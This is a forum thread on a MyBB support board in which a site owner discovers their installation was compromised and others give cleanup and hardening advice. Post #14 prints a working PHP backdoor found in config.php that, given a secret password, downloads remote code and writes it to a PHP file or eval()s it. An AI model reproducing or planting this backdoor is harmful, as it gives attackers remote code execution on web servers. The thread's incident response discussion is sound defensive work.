Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Security Issue
#11
After install I change the file to 644 but I believe 444 will be fine too.
#12
open the config.php file and check any vulnerability script added inside it...

i belief after few more blank lines there may be vulnerable code passing you information

check out the post
http://community.mybb.com/thread-105780-...#pid772311
#13
You should also check with your host as some hosts automatically lower the chmods of files that are chmoded to 777.
#14
This was in the config.php file :

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '5c971edc0b2cc92fc99b5a3609450cb7'){
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}
#15
EDIT: I've just read your last post now... your file was seriously modified http://wiki.mybb.com/index.php/Inc/config.php














---------------------
I think it's a HOST action, too.

I'm hosted at Mediatemple Gridserver and I think that they have enabled a script to CHMOD to 0444 such plain text files with passwords, when uploaded. Default to other files is 0755

Anyway if \inc\config.php is not writable it's a good think to your security, I see that warning in Maintenance under AdminCP and don't give a orange to it Toungue

To increase security you can add in your-forum-url/inc/ this:

File: /inc/.htaccess

<files config.php>
Order allow,deny
Deny from all
</files>

<files .htaccess>
Order allow,deny
Deny from all
</files>
#16
That's injection code. You're compromised.
#17
What shall I do ?
#18
Delete the code, or just download and re-upload the most recent version of MyBB.
-Paul H.

Cogisne lingua latina?
#19
(2011-10-17, 04:27 PM)Paul H. Wrote: Delete the code, or just download and re-upload the most recent version of MyBB.

wont include config.php though, so upload all new MyBB code (download it again from the site today) and then upload it all.

clean up existing config.php

delete settings.php and let myBB recreate it.

secure your site, change passwords, run security checks on templates, browse your site's file system for odd files you dont recognize, etc.

Lost interest, sold my sites, will browse here once in a while. It's been fun.
#20
My guess is that you should have an expert fix and secure this for you. It's likely that it's all backdoored and unless you're thorough to remove every trace of the exploit you'll just be compromised again.



Forum Jump:


Users browsing this thread: 1 Guest(s)